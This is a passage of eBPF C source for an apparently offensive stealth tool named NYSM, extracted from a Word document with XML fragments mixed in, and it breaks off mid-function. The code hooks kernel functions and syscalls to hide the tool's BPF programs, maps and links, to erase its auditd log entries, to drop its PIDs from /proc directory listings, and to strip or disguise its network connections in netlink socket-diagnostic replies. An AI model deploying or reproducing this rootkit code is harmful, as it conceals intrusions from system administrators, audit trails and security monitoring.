          <w:szCs w:val="28"/>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#include "vmlinux.h"</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#include &lt;bpf/bpf_helpers.h&gt;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#include &lt;bpf/bpf_tracing.h&gt;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#include &lt;bpf/bpf_core_read.h&gt;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Kernel declared macros</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#define BPF_PROG_GET_NEXT_ID        11 // bpf.h         https://elixir.bootlin.com/linux/v6.4/source/include/uapi/linux/bpf.h#L878</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#define BPF_MAP_GET_NEXT_ID         12 // bpf.h         https://elixir.bootlin.com/linux/v6.4/source/include/uapi/linux/bpf.h#L879</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#define BPF_LINK_GET_NEXT_ID        31 // bpf.h         https://elixir.bootlin.com/linux/v6.4/source/include/uapi/linux/bpf.h#L898</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#define DT_DIR                      4  // fs_types.h    https://elixir.bootlin.com/linux/v6.4/source/include/linux/fs_types.h#L37</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#define NETLINK_SOCK_DIAG           4  // netlink.h     https://elixir.bootlin.com/linux/v6.4/source/include/uapi/linux/netlink.h#L13</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#define AF_NETLINK                  16 // socket.h      https://elixir.bootlin.com/linux/v6.4/source/include/linux/socket.h#L205</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#define AF_INET                     2  // socket.h      https://elixir.bootlin.com/linux/v6.4/source/include/linux/socket.h#L191</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#define SOCK_DIAG_BY_FAMILY         20 // sock_diag.h   https://elixir.bootlin.com/linux/v6.4/source/include/uapi/linux/sock_diag.h#L7</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#define TCP_ESTABLISHED             1  // tcp_states.h  https://elixir.bootlin.com/linux/v6.4/source/include/net/tcp_states.h#L13</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#define TCP_CLOSE_WAIT              8  // tcp_states.h  https://elixir.bootlin.com/linux/v6.4/source/include/net/tcp_states.h#L20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#define TCP_LISTEN                  10 // tcp_states.h  https://elixir.bootlin.com/linux/v6.4/source/include/net/tcp_states.h#L22</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Self declared macros</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#define AUDIT_LOG_SIZE              27  // referenced:  kprobe:audit_log_end, tracepoint:sys_exit_recvfrom</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#define PID_MAX_SIZE                8   // referenced:  tracepoint:sys_exit_getdents64</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#define DIRENT_BPF_LOOP             128 // referenced:  tracepoint:sys_exit_getdents64</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#define RECVMSG_BPF_LOOP            128 // referenced:  tracepoint:sys_exit_recvmsg</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char LICENSE[] SEC("license") = "Dual BSD/GPL";</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struct exit_format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unsigned long long h;</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uint32_t __syscall_nr;</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uint64_t ret;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struct enter_bpf_format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unsigned long long h;</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uint32_t __syscall_nr;</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uint64_t cmd;</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uint64_t uattr;</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uint64_t size;</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struct enter_recvfrom_format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unsigned long long h;</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uint32_t __syscall_nr;</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uint64_t fd;</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uint64_t ubuf;</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    uint64_t size;</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uint64_t flags;</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uint64_t addr;</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int32_t  addr_len;</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struct enter_getdents64_format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unsigned long long h;</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uint32_t __syscall_nr;</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uint64_t fd;</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uint64_t *dirent;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uint64_t size;</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struct enter_socket_format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unsigned long long h;</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uint32_t __syscall_nr;</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int64_t  family;</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int64_t  type;</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int64_t  protocol;</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struct enter_connect_format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unsigned long long h;</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uint32_t __syscall_nr;</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int64_t  sockfd;</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uint64_t *addr;</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int64_t  addrlen;</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struct enter_bind_format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unsigned long long h;</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uint32_t __syscall_nr;</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int64_t  sockfd;</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uint64_t *addr;</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int64_t  addrlen;</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struct enter_close_format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unsigned long long h;</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uint32_t __syscall_nr;</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uint64_t  fd;</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struct enter_recvmsg_format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unsigned long long h;</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uint32_t __syscall_nr;</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int64_t  fd;</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uint64_t *msg;</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uint64_t flags;</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struct enter_audit_log_end_data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struct nlmsghdr nlh;</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char message[AUDIT_LOG_SIZE];</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struct exit_getdents64_recursive_data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uint16_t d_reclen;</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uint64_t old_offset;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uint64_t offset;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uint64_t change_me;</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lastRenderedPageBreak/>
        <w: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struct enter_connect_bind_socket_data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uint16_t port;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uint32_t addr;</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struct inet_diag_msg { // https://elixir.bootlin.com/linux/v6.4/source/include/uapi/linux/inet_diag.h#L117</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uint8_t  idiag_family;</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uint8_t  idiag_state;</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uint8_t  idiag_timer;</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uint8_t  idiag_retrans;</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struct inet_diag_sockid https://elixir.bootlin.com/linux/v6.4/source/include/uapi/linux/inet_diag.h#L14</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uint16_t idiag_sport;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uint16_t idiag_dport;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uint32_t idiag_src[4];</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uint32_t idiag_dst[4];</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uint32_t idiag_if;</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uint32_t idiag_cookie[2];</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uint32_t idiag_expires;</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uint32_t idiag_rqueue;</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uint32_t idiag_wqueue;</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uint32_t idiag_uid;</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uint32_t idiag_inode;</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struct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__uint(type       , BPF_MAP_TYPE_HASH);</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__uint(key_size   , sizeof(uint32_t));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__uint(value_size , sizeof(struct uattr_ptr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__uint(max_entries, 1024);</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map_bpf_object_pid SEC(".maps");</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struct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__uint(type       , BPF_MAP_TYPE_HASH);</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__uint(key_size   , sizeof(uint32_t));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__uint(value_size , sizeof(uint32_t));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__uint(max_entries, 1024);</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map_bpf_cmd_pid SEC(".maps");</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struct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__uint(type       , BPF_MAP_TYPE_HASH);</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__uint(key_size   , sizeof(uint32_t));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__uint(value_size , sizeof(uint32_t));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__uint(max_entries, 1024);</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map_security_bpf_prog_id_data SEC(".maps");</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struct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__uint(type       , BPF_MAP_TYPE_HASH);</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__uint(key_size   , sizeof(uint32_t));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__uint(value_size , sizeof(uint32_t));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__uint(max_entries, 1024);</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map_security_bpf_map_id_data SEC(".maps");</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struct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__uint(type       , BPF_MAP_TYPE_HASH);</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__uint(key_size   , sizeof(uint32_t));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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    __uint(value_size , sizeof(uint32_t));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__uint(max_entries, 1024);</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map_bpf_link_prime_id_data SEC(".maps");</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struct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__uint(type       , BPF_MAP_TYPE_HASH);</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__uint(key_size   ,sizeof(uint32_t));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__uint(value_size , sizeof(struct bpf_link_primer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__uint(max_entries, 1024);</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map_bpf_link_prime_pid SEC(".maps");</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struct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__uint(type       , BPF_MAP_TYPE_HASH);</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__uint(key_size   , sizeof(struct enter_audit_log_end_data));</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__uint(value_size , sizeof(uint32_t));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__uint(max_entries, 1024);</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map_audit_log_end_msg_data SEC(".maps");</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struct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__uint(type       , BPF_MAP_TYPE_HASH);</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__uint(key_size   , sizeof(uint32_t));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__uint(value_size , sizeof(uint64_t));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__uint(max_entries, 1024);</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map_recvfrom_pid SEC(".maps");</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struct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__uint(type       , BPF_MAP_TYPE_HASH);</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__uint(key_size   , sizeof(uint32_t));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__uint(value_size , sizeof(struct linux_dirent64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__uint(max_entries, 1024);</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map_getdents64_pid SEC(".maps");</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struct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__uint(type       , BPF_MAP_TYPE_HASH);</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__uint(key_size   , sizeof(uint32_t));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__uint(value_size , sizeof(uint32_t));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__uint(max_entries, 4096);</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map_alloc_pid_pid_data SEC(".maps");</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struct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__uint(type       , BPF_MAP_TYPE_PROG_ARRAY);</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__uint(max_entries, 5);</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__type(key        , __u32);</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__type(value      , __u32);</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map_getdents64_recursive_tail_call SEC(".maps");</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struct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__uint(type       , BPF_MAP_TYPE_HASH);</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__uint(key_size   , sizeof(uint32_t));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__uint(value_size , sizeof(struct exit_getdents64_recursive_data));</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__uint(max_entries, 1024);</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map_getdents64_recursive_pid SEC(".maps");</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struct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__uint(type       , BPF_MAP_TYPE_HASH);</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__uint(key_size   , sizeof(uint32_t));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__uint(value_size , sizeof(uint32_t));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__uint(max_entries, 1024);</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map_socket_pid SEC(".maps");</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struct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__uint(type       , BPF_MAP_TYPE_HASH);</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    __uint(key_size   , sizeof(struct enter_connect_bind_socket_data));</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__uint(value_size , sizeof(uint32_t));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__uint(max_entries, 1024);</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map_connect_bind_socket_data SEC(".maps");</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struct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__uint(type       , BPF_MAP_TYPE_HASH);</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__uint(key_size   , sizeof(uint32_t));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__uint(value_size , sizeof(uint64_t));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__uint(max_entries, 1024);</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map_recvmsg_pid SEC(".maps");</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static int bpf_map_read_elem(void *dst, int size, void *map, int key)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void *ptr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ptr = bpf_map_lookup_elem(map, &amp;key);</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(!ptr) return 1;</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bpf_probe_read(dst, size, ptr);</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static uint32_t get_next_non_listed_id(void *map, uint32_t id)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(!bpf_map_lookup_elem(map, &amp;id))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for (int i=0;i&lt;256;i++)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id++;</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(!bpf_map_lookup_elem(map, &amp;id)) break;</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return id;</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static uint32_t bpf_get_ns(void)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struct  nsproxy       *nsproxy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struct  pid_namespace *pid_ns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struct  ns_common     ns       =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struct task_struct *task = (struct task_struct *)bpf_get_current_task();</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bpf_probe_read(&amp;nsproxy, sizeof(nsproxy), &amp;task-&gt;nsproxy);</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bpf_probe_read(&amp;pid_ns , sizeof(pid_ns) , &amp;nsproxy-&gt;pid_ns_for_children);</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bpf_probe_read(&amp;ns     , sizeof(ns)     , &amp;pid_ns-&gt;ns);</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return ns.inum;</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static uint32_t atoi(unsigned char *string)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uint32_t number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next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for (int i=0;i&lt;PID_MAX_SIZE;i++)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if(string[i] == 0) break;</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next = string[i]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(next &lt; 0 || next &gt; 9)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number = number * 10 + next;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return number;</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uint64_t pidns;</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lastRenderedPageBreak/>
        <w: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Hide BPF programs, maps, and links.</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|__ tracepoint:sys_enter_bpf</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   |__ Store PID of non-NYSM processes running bpf for map, link and program listing.</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|__ tracepoint:sys_exit_bpf</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   |__ Hide NYSM bpf programs, maps, and links to non-NYSM processes.</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|__ kprobe:security_bpf_prog</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   |__ Store new NYSM bpf programs ID.</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|__ kprobe:security_bpf_map</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   |__ Store new NYSM bpf maps ID.</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|__ kprobe:bpf_link_prime</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   |__ Store new NYSM bpf links primer buffer address.</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|__ kretprobe:bpf_link_prime</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   |__ Store new NYSM bpf links ID from bpf_link_prime links primer buffer.</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|__ kprobe:bpf_prog_put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   |__ Clean programs ID from security_bpf_prog map.</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|__ kprobe:bpf_map_put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   |__ Clean maps ID from security_bpf_map map.</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|__ kprobe:bpf_link_cleanup</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|__ Clean links ID from bpf_link_prime map.</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SEC("tp/syscalls/sys_enter_bpf")</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int tracepoint_bpf_enter(struct enter_bpf_format *ctx)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union bpf_attr *uattr_ptr = (void *) ctx-&gt;uattr;</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uint32_t tgid = bpf_get_current_pid_tgid() &gt;&gt; 32,</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prog = BPF_PROG_GET_NEXT_ID,</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map  = BPF_MAP_GET_NEXT_ID,</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link = BPF_LINK_GET_NEXT_ID;</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(bpf_get_ns() == pidns)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switch (ctx-&gt;cmd)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case BPF_PROG_GET_NEXT_ID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bpf_map_update_elem(&amp;map_bpf_cmd_pid, &amp;tgid, &amp;prog, BPF_ANY);</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break;</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case BPF_MAP_GET_NEXT_ID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bpf_map_update_elem(&amp;map_bpf_cmd_pid, &amp;tgid, &amp;map , BPF_ANY);</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break;</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case BPF_LINK_GET_NEXT_ID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bpf_map_update_elem(&amp;map_bpf_cmd_pid, &amp;tgid, &amp;link, BPF_ANY);</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break;</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default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break;</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bpf_map_update_elem(&amp;map_bpf_object_pid, &amp;tgid, &amp;uattr_ptr, BPF_ANY);</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SEC("tp/syscalls/sys_exit_bpf")</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int tracepoint_bpf_exit(void)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union bpf_attr *uattr_ptr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union bpf_attr attr       =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uint32_t tgid   = bpf_get_current_pid_tgid() &gt;&gt; 32,</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branch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lastRenderedPageBreak/>
        <w:t xml:space="preserve">             id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(bpf_get_ns() == pidns)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(bpf_map_read_elem(&amp;branch, sizeof(branch), &amp;map_bpf_cmd_pid, tgid))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(bpf_map_delete_elem(&amp;map_bpf_cmd_pid, &amp;tgid))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(bpf_map_read_elem(&amp;uattr_ptr, sizeof(uattr_ptr), &amp;map_bpf_object_pid, tgid))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(bpf_map_delete_elem(&amp;map_bpf_object_pid, &amp;tgid))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bpf_probe_read(&amp;attr, sizeof(attr), uattr_ptr);</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switch (branch)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case BPF_PROG_GET_NEXT_ID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id = get_next_non_listed_id(&amp;map_security_bpf_prog_id_data, attr.next_id);</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break;</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case BPF_MAP_GET_NEXT_ID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id = get_next_non_listed_id(&amp;map_security_bpf_map_id_data , attr.next_id);</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break;</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case BPF_LINK_GET_NEXT_ID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id = get_next_non_listed_id(&amp;map_bpf_link_prime_id_data   , attr.next_id);</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break;</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default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break;</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(!id)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bpf_probe_write_user(&amp;uattr_ptr-&gt;next_id, &amp;id, sizeof(uint32_t));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SEC("kprobe/security_bpf_prog")</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int BPF_KPROBE(security_bpf_prog, struct bpf_prog *prog)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struct  bpf_prog_aux *aux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uint32_t bid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(bpf_get_ns() != pidns)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bpf_probe_read(&amp;aux, sizeof(aux), &amp;prog-&gt;aux);</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bpf_probe_read(&amp;bid, sizeof(bid), &amp;aux-&gt;id);</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bpf_map_update_elem(&amp;map_security_bpf_prog_id_data, &amp;bid, &amp;bid, BPF_ANY);</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SEC("kprobe/security_bpf_map")</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int BPF_KPROBE(security_bpf_map, struct bpf_map *map, fmode_t fmode)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uint32_t id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(bpf_get_ns() != pidns)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bpf_probe_read(&amp;id, sizeof(id), &amp;map-&gt;id);</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    bpf_map_update_elem(&amp;map_security_bpf_map_id_data, &amp;id, &amp;id, BPF_ANY);</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SEC("kprobe/bpf_link_prime")</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int BPF_KPROBE(bpf_link_prime, struct bpf_link *link, struct bpf_link_primer *primer)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uint32_t tgid = bpf_get_current_pid_tgid() &gt;&gt; 32;</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(bpf_get_ns() != pidns)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bpf_map_update_elem(&amp;map_bpf_link_prime_pid, &amp;tgid, &amp;primer, BPF_ANY);</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SEC("kretprobe/bpf_link_prime")</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int BPF_KRETPROBE(bpf_link_prime_exit, int ret)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struct bpf_link_primer *primer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uint32_t tgid = bpf_get_current_pid_tgid() &gt;&gt; 32,</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id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(bpf_get_ns() != pidns)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(bpf_map_read_elem(&amp;primer, sizeof(primer), &amp;map_bpf_link_prime_pid, tgid))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(bpf_map_delete_elem(&amp;map_bpf_link_prime_pid, &amp;tgid))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bpf_probe_read(&amp;id, sizeof(id), &amp;primer-&gt;id);</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bpf_map_update_elem(&amp;map_bpf_link_prime_id_data, &amp;id, &amp;id, BPF_ANY);</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SEC("kprobe/bpf_prog_put")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int BPF_KPROBE(bpf_prog_put, struct bpf_prog *prog)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struct  bpf_prog_aux *aux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uint32_t bid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bpf_probe_read(&amp;aux, sizeof(aux), &amp;prog-&gt;aux);</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bpf_probe_read(&amp;bid, sizeof(bid), &amp;aux-&gt;id);</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(!bpf_map_lookup_elem(&amp;map_security_bpf_prog_id_data, &amp;bid))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(bpf_map_delete_elem(&amp;map_security_bpf_prog_id_data, &amp;bid))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SEC("kprobe/bpf_map_put")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int BPF_KPROBE(bpf_map_put, struct bpf_map *map)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uint32_t id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bpf_probe_read(&amp;id, sizeof(id), &amp;map-&gt;id);</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(!bpf_map_lookup_elem(&amp;map_security_bpf_map_id_data, &amp;id))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(bpf_map_delete_elem(&amp;map_security_bpf_map_id_data, &amp;id))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lastRenderedPageBreak/>
        <w:t>SEC("kprobe/bpf_link_cleanup")</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int BPF_KPROBE(bpf_link_cleanup, struct bpf_link_primer *primer)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uint32_t id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bpf_probe_read(&amp;id, sizeof(id), &amp;primer-&gt;id);</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(!bpf_map_lookup_elem(&amp;map_bpf_link_prime_id_data, &amp;id))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(bpf_map_delete_elem(&amp;map_bpf_link_prime_id_data, &amp;id))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Hide NYSM programs Auditd generated logs.</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|__ kprobe:audit_log_end</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   |__ Store message logs sent by NYSM programs.</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|__ tracepoint:sys_enter_recvfrom</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   |__ Store non-NYSM output message logs buffer address.</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|__ tracepoint:sys_exit_recvfrom</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|__ Hide audit_log_end message logs from sys_enter_recvfrom message logs output buffer.</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SEC("kprobe/audit_log_end")</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int BPF_KPROBE(audit_log_end, struct audit_buffer *ab)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struct sk_buff                  *skb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struct enter_audit_log_end_data audit_msg =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void     *head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*ptr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uint32_t skb_len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count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(bpf_get_ns() != pidns)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bpf_probe_read(&amp;skb              , sizeof(skb)              , &amp;ab-&gt;skb);</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bpf_probe_read(&amp;head             , sizeof(head)             , &amp;skb-&gt;head);</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bpf_probe_read(&amp;skb_len          , sizeof(skb_len)          , &amp;skb-&gt;len);</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bpf_probe_read(&amp;audit_msg.nlh    , sizeof(audit_msg.nlh)    , head);</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bpf_probe_read(&amp;audit_msg.message, sizeof(audit_msg.message), head+offsetof(struct enter_audit_log_end_data, message));</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audit_msg.nlh.nlmsg_len = skb_len-sizeof(struct nlmsghdr);</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ptr = bpf_map_lookup_elem(&amp;map_audit_log_end_msg_data, &amp;audit_msg);</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(ptr)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bpf_probe_read(&amp;count, sizeof(count), ptr);</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count++;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bpf_map_update_elem(&amp;map_audit_log_end_msg_data, &amp;audit_msg, &amp;count, BPF_ANY);</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SEC("tp/syscalls/sys_enter_recvfrom")</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int tracepoint_recvfrom_enter(struct enter_recvfrom_format *ctx)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void     *ubuf = (void *)ctx-&gt;ubuf;</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uint32_t tgid  = bpf_get_current_pid_tgid() &gt;&gt; 32;</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    if (bpf_get_ns() == pidns)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bpf_map_update_elem(&amp;map_recvfrom_pid, &amp;tgid, &amp;ubuf, BPF_ANY);</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SEC("tp/syscalls/sys_exit_recvfrom")</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int tracepoint_recvfrom_exit(void)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struct enter_audit_log_end_data audit_msg =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void     *ubuf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*ptr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uint32_t tgid  = bpf_get_current_pid_tgid() &gt;&gt; 32,</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count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zero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(bpf_get_ns() == pidns)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(bpf_map_read_elem(&amp;ubuf, sizeof(ubuf), &amp;map_recvfrom_pid, tgid))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(bpf_map_delete_elem(&amp;map_recvfrom_pid, &amp;tgid))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bpf_probe_read(&amp;audit_msg.nlh    , sizeof(audit_msg.nlh)    , ubuf);</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bpf_probe_read(&amp;audit_msg.message, sizeof(audit_msg.message), ubuf+offsetof(struct enter_audit_log_end_data, message));</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ptr = bpf_map_lookup_elem(&amp;map_audit_log_end_msg_data, &amp;audit_msg);</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(!ptr)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bpf_probe_read(&amp;count, sizeof(count), ptr);</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(count == 0)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(bpf_map_delete_elem(&amp;map_audit_log_end_msg_data, &amp;audit_msg))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else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count--;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bpf_map_update_elem(&amp;map_audit_log_end_msg_data, &amp;audit_msg, &amp;count, BPF_ANY);</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bpf_probe_write_user(ubuf, &amp;zero, sizeof(zero));</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Hide new NYSM programs PID.</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|__ kretprobe:alloc_pid</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   |__ Store new NYSM programs PID.</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|__ kprobe:free_pid</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   |__ Clean PID from alloc_pid map.</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|__ tracepoint:sys_enter_getdents64</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   |__ Store non-NYSM programs directory entries output buffer address.</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|__ tracepoint:sys_exit_getdents64</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|__ Hide alloc_pid PID from sys_enter_getdents64 directory entries output buffer</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SEC("kretprobe/alloc_pid")</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lastRenderedPageBreak/>
        <w:t>int BPF_KRETPROBE(alloc_pid_exit, void *ret_pid)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struct upid numbers =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(bpf_get_ns() != pidns)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bpf_probe_read(&amp;numbers, sizeof(numbers), ret_pid+offsetof(struct pid, numbers));</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bpf_map_update_elem(&amp;map_alloc_pid_pid_data, &amp;numbers.nr, &amp;numbers.nr, BPF_ANY);</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SEC("kprobe/free_pid")</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int BPF_KPROBE(free_pid, struct pid *pid)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struct upid numbers =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(bpf_get_ns() != pidns)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bpf_probe_read(&amp;numbers, sizeof(numbers), pid-&gt;numbers);</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(!bpf_map_lookup_elem(&amp;map_alloc_pid_pid_data, &amp;numbers.nr))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(bpf_map_delete_elem(&amp;map_alloc_pid_pid_data, &amp;numbers.nr))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SEC("tracepoint/syscalls/sys_enter_getdents64")</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int tracepoint_getdents64_enter(struct enter_getdents64_format *ctx)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struct task_struct  *task   = (struct task_struct *)bpf_get_current_task();</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struct files_struct *files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struct fdtable      *fdt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struct file         **fd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struct file         *f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struct dentry       *dentry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struct qstr         d_name  =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void     *dirent = ctx-&gt;dirent;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uint32_t tgid    = bpf_get_current_pid_tgid() &gt;&gt; 32;</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uint8_t  name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(bpf_get_ns() == pidns)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bpf_probe_read(&amp;files , sizeof(files) , &amp;task-&gt;files);</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bpf_probe_read(&amp;fdt   , sizeof(fdt)   , &amp;files-&gt;fdt);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bpf_probe_read(&amp;fd    , sizeof(fd)    , &amp;fdt-&gt;fd);</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bpf_probe_read(&amp;f     , sizeof(f)     , &amp;fd[ctx-&gt;fd]);</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bpf_probe_read(&amp;dentry, sizeof(dentry), &amp;f-&gt;f_path.dentry);</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bpf_probe_read(&amp;d_name, sizeof(d_name), &amp;dentry-&gt;d_name);</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bpf_probe_read(&amp;name  , sizeof(name)  , d_name.name);</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(name != '/')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bpf_map_update_elem(&amp;map_getdents64_pid, &amp;tgid, &amp;dirent, BPF_ANY);</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SEC("tracepoint/syscalls/sys_exit_getdents64")</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int tracepoint_getdents64_exit(struct exit_format *ctx)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struct linux_dirent64            dirent      =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struct exit_getdents64_recursive_data data        =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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        .d_reclen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.old_offset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.offset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.change_me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void     *dirent_ptr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uint64_t ret                  = ctx-&gt;ret;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uint32_t tgid                 = bpf_get_current_pid_tgid() &gt;&gt; 32,</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pid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uint8_t  d_name[PID_MAX_SIZE] =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d_type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(bpf_get_ns() == pidns)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(!bpf_map_lookup_elem(&amp;map_getdents64_recursive_pid, &amp;tgid))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bpf_map_update_elem(&amp;map_getdents64_recursive_pid, &amp;tgid, &amp;data, BPF_ANY);</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(bpf_map_read_elem(&amp;data, sizeof(data), &amp;map_getdents64_recursive_pid, tgid))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(bpf_map_read_elem(&amp;dirent_ptr, sizeof(dirent_ptr), &amp;map_getdents64_pid, tgid))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for (int i=0;i&lt;DIRENT_BPF_LOOP;i++)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bpf_probe_read(&amp;dirent, sizeof(dirent), dirent_ptr+data.offset);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bpf_probe_read(&amp;d_name, sizeof(d_name), ((struct linux_dirent64 *)(dirent_ptr+data.offset))-&gt;d_name);</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bpf_probe_read(&amp;d_type, sizeof(d_type), &amp;((struct linux_dirent64 *)(dirent_ptr+data.offset))-&gt;d_type);</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pid = atoi(d_name);</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(bpf_map_lookup_elem(&amp;map_alloc_pid_pid_data, &amp;pid))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(!data.d_reclen)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data.d_reclen  = (data.offset-data.old_offset)+dirent.d_reclen;</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data.change_me = data.old_offset;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else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data.d_reclen += dirent.d_reclen;</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else if (data.d_reclen &amp;&amp; data.change_me &amp;&amp; d_type == DT_DIR)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bpf_probe_write_user(&amp;((struct linux_dirent64 *)(dirent_ptr+data.change_me))-&gt;d_reclen, &amp;data.d_reclen, sizeof(data.d_reclen));</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data.d_reclen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data.change_me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data.old_offset = data.offset;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data.offset += dirent.d_reclen;</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(data.offset &gt;= ret) break;</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bpf_map_update_elem(&amp;map_getdents64_recursive_pid, &amp;tgid, &amp;data, BPF_ANY);</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(data.offset &lt; ret) bpf_tail_call(ctx, &amp;map_getdents64_recursive_tail_call, 1);</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(bpf_map_delete_elem(&amp;map_getdents64_pid, &amp;tgid))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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    if (bpf_map_delete_elem(&amp;map_getdents64_recursive_pid, &amp;tgid))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Hide NETLINK_SOCK_DIAG AF_NETLINK socket result.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|__ tracepoint:sys_enter_socket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   |__ Store PID of non-NYSM processes running socket(AF_NETLINK, .., NETLINK_SOCK_DIAG).</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|__ tracepoint:sys_enter_connect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   |__ Store port and address of NYSM processes connections.</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|__ tracepoint:sys_enter_bind</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   |__ Store port and address of NYSM processes bindings.</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|__ tracepoint:sys_enter_recvmsg</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   |__ Store recvmsg output buffer address if the PID is the same as sys_enter_socket.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|__ tracepoint:sys_exit_recvmsg</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     |__ Hide NYSM processes connections and bindings from sys_enter_recvmsg output buffer.</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SEC("tp/syscalls/sys_enter_socket")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int tracepoint_socket_enter(struct enter_socket_format *ctx)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uint32_t tgid = bpf_get_current_pid_tgid() &gt;&gt; 32;</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(bpf_get_ns() == pidns)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(ctx-&gt;family != AF_NETLINK || ctx-&gt;protocol != NETLINK_SOCK_DIAG)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(!bpf_map_lookup_elem(&amp;map_socket_pid, &amp;tgid))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bpf_map_update_elem(&amp;map_socket_pid, &amp;tgid, &amp;tgid, BPF_ANY);</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SEC("tracepoint/syscalls/sys_enter_connect")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int tracepoint_connect_enter(struct enter_connect_format *ctx)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struct sockaddr_in                    addr      =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struct enter_connect_bind_socket_data sock_name =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uint32_t tgid = bpf_get_current_pid_tgid() &gt;&gt; 32;</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(bpf_get_ns() != pidns)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bpf_probe_read(&amp;addr, sizeof(addr), ctx-&gt;addr);</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(addr.sin_family != AF_INET)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sock_name.port = addr.sin_port;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sock_name.addr = addr.sin_addr.s_addr;</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(!bpf_map_lookup_elem(&amp;map_connect_bind_socket_data, &amp;sock_name))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bpf_map_update_elem(&amp;map_connect_bind_socket_data, &amp;sock_name, &amp;tgid, BPF_ANY);</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lastRenderedPageBreak/>
        <w:t>SEC("tracepoint/syscalls/sys_enter_bind")</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int tracepoint_bind_enter(struct enter_bind_format *ctx)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struct sockaddr_in                    addr      =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struct enter_connect_bind_socket_data sock_name =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uint32_t tgid = bpf_get_current_pid_tgid() &gt;&gt; 32;</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(bpf_get_ns() != pidns)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bpf_probe_read(&amp;addr, sizeof(addr), ctx-&gt;addr);</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(addr.sin_family != AF_INET)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sock_name.port = addr.sin_port;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sock_name.addr = addr.sin_addr.s_addr;</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(!bpf_map_lookup_elem(&amp;map_connect_bind_socket_data, &amp;sock_name))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bpf_map_update_elem(&amp;map_connect_bind_socket_data, &amp;sock_name, &amp;tgid, BPF_ANY);</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(!bpf_map_lookup_elem(&amp;map_connect_bind_socket_data, &amp;sock_name))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SEC("tp/syscalls/sys_enter_recvmsg")</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int tracepoint_recvmsg_enter(struct enter_recvmsg_format *ctx)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struct user_msghdr msg      =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struct sockaddr_nl msg_name =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struct iovec       msg_iov  =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uint32_t tgid = bpf_get_current_pid_tgid() &gt;&gt; 32;</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(bpf_get_ns() == pidns)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(!bpf_map_lookup_elem(&amp;map_socket_pid, &amp;tgid))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bpf_probe_read(&amp;msg, sizeof(msg), ctx-&gt;msg);</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(msg.msg_namelen != 12)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bpf_probe_read(&amp;msg_name, sizeof(msg_name), msg.msg_name);</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(msg_name.nl_family != AF_NETLINK)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bpf_probe_read(&amp;msg_iov, sizeof(msg_iov), msg.msg_iov);</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bpf_map_update_elem(&amp;map_recvmsg_pid, &amp;tgid, &amp;msg_iov.iov_base, BPF_ANY);</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SEC("tp/syscalls/sys_exit_recvmsg")</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int tracepoint_recvmsg_exit(struct exit_format *ctx)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struct nlmsghdr                        msghdr        =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struct enter_connect_bind_socket_data  sock_name_src =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sock_name_dst =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void     *iov_base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uint32_t tgid         = bpf_get_current_pid_tgid() &gt;&gt; 32,</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idiag_src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idiag_dst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idiag_if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idiag_wqueue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offset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last_offest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lastRenderedPageBreak/>
        <w:t xml:space="preserve">             last_msglen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new_msglen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change_me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uint16_t idiag_sport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idiag_dport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uint8_t  idiag_family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idiag_state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(bpf_get_ns() == pidns)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(!bpf_map_lookup_elem(&amp;map_socket_pid, &amp;tgid))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(bpf_map_read_elem(&amp;iov_base, sizeof(iov_base), &amp;map_recvmsg_pid, tgid))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(bpf_map_delete_elem(&amp;map_recvmsg_pid, &amp;tgid))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for (int i=0;i&lt;RECVMSG_BPF_LOOP;i++)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bpf_probe_read(&amp;msghdr, sizeof(msghdr), iov_base+offset);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(msghdr.nlmsg_len == 0)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(change_me || new_msglen)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bpf_probe_write_user(iov_base+change_me+offsetof(struct nlmsghdr, nlmsg_len), &amp;new_msglen, sizeof(uint32_t));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(msghdr.nlmsg_type != SOCK_DIAG_BY_FAMILY)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bpf_probe_read(&amp;idiag_family, sizeof(idiag_family), iov_base+offset+sizeof(msghdr));</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(idiag_family != AF_INET) return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bpf_probe_read(&amp;idiag_sport, sizeof(idiag_sport), iov_base+offset+sizeof(msghdr)+offsetof(struct inet_diag_msg, idiag_sport));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bpf_probe_read(&amp;idiag_dport, sizeof(idiag_dport), iov_base+offset+sizeof(msghdr)+offsetof(struct inet_diag_msg, idiag_dport));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bpf_probe_read(&amp;idiag_src  , sizeof(idiag_src)  , iov_base+offset+sizeof(msghdr)+offsetof(struct inet_diag_msg, idiag_src));</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bpf_probe_read(&amp;idiag_dst  , sizeof(idiag_dst)  , iov_base+offset+sizeof(msghdr)+offsetof(struct inet_diag_msg, idiag_dst));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sock_name_dst.port = idiag_dport;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sock_name_dst.addr = idiag_dst;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sock_name_src.port = idiag_sport;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sock_name_src.addr = idiag_src;</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(bpf_map_lookup_elem(&amp;map_connect_bind_socket_data, &amp;sock_name_dst) || bpf_map_lookup_elem(&amp;map_connect_bind_socket_data, &amp;sock_name_src))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if (i == 0)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bpf_probe_read(&amp;idiag_state, sizeof(idiag_dport), iov_base+offset+sizeof(msghdr)+sizeof(uint8_t));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switch (idiag_state)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case TCP_ESTABLISHED:</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case TCP_CLOSE_WAIT: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idiag_sport  = 13568;     // 53</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idiag_dport  = 13568;     // 53</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idiag_src    = 16777343;  // 127.0.0.1</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idiag_dst    = 889192575; // 127.0.0.53</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idiag_if     = 1;</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idiag_wqueue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break;</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case TCP_LISTEN:</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lastRenderedPageBreak/>
